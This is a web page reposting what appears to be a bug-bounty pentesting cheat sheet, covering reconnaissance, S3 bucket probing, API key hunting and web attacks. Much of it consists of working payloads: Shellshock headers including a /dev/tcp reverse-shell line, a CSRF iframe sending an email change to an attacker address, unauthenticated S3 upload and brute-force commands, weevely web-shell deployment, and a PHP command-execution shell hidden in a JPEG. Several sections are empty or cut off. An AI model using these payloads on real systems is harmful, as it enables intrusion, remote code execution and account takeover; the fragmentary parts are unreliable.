Web Penetration Testing 101: A Beginner's Guide into Bug Bounty Programs

A comprehensive guide for students on penetration testing, covering topics such as Linux, web penetration testing, Active Directory, and cryptography,
Please wait 0 seconds...
Scroll Down and click on Go to Link for destination
Congrats! Link is Generated



  1. Enumerate Domains.
  2. Enumerate Subdomains: recon.sh + httpx or Knockpy -w subdomains $domain.com.
  3. Enumerate Params: gau, waybackurls, paramspider and dirsearch.
  4. Enumerate ports of each subdomain: nmap.
  5. API KEYS - cat url.txt | grep ".js" xargs -I@ sh -c 'python.exe SecretFinder.py -i @ -e -o cli' | tee apiKeys.txt
  6. Maltego + FOCA.
  7. Google Dorks.
  8. Frameworks, Languages, PaaS and Servers.
  9. Shodan to know cves exposure

Recon searching for:


  1. setRequestHeader
  2. XMLHttpRequest
  3. $.ajax
  4. $.get
  5. $.post
  6. $.getJSON
  7. fetch(
  8. axios({
  9. Url = "http




  1. set_cookie(
  2. base64

S3 Buckets

  • s3.amazonaws.com
  • Read: aws s3 ls s3://domain --no-sign-request = Response: An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist
  • Upload: aws s3 cp poc.html s3://domain --no-sign-request = load to s3://
  • Bruteforce: cat subdomains.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request' | grep -v 'An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist'

API Tokens:

  1. pk_live
  2. sk_live
  3. AIza


The Json web tokens cannot be tested in automated ways, so it is more likely to meet some bugs.

Open Redirect

Use "Burp Seach"



List forms to change password, email and delete account via GET Request + Submit input.

<iframe src="$url?email=hacker@attacker-website.com"></iframe>

Type Juggling

POST https://example.com/login.php HTTP/1.1
Accept: */*
Content-Type: application/json


Add [] to password

Shellshock Attack

POST https://example.com/session.cgi HTTP/1.1
Accept: */*
User-Agent: () { :; }; echo "pwned"

User-Agent: () { :; }; echo "pwned"

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

curl -s -X GET "http://localhost/cgi-bin/stats" -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/ 0>&1"

echo to bypass WAF


Always test params with GET Requests: https://github.com/AngelJuanMa/Web-Vulnerabilities/blob/main/Payloads/CRLF.txt

Google Dorks

python3.9 pagodo.py -d example.com -g ./dorks/all_google_dorks.txt
cat pagodo.py.log | grep 'Found unique URL #'

4.2 days to finish

Host Header Atttack

POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: SUBDOMAIN.burpcollaborator.net

Subdomain Takeover


Api keys



InQL extension of burp suite to list endpoints.

WAF bypass

sudo apt install jq
git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
cd bypass-firewalls-by-DNS-history/
bash bypass-firewalls-by-DNS-history.sh --help



weevely generate 12345 404.php
weevely http://domain.com/404.php 12345

jhead -purejpg ns.jpg
jhead -ce ns.jpg
mv ns.jpg ns.php.jpg


<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="foto.jpg" border=0>


Source : github.com@AngelJuanMa/Pentesting

About the Author

Ordinary People

Post a Comment

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.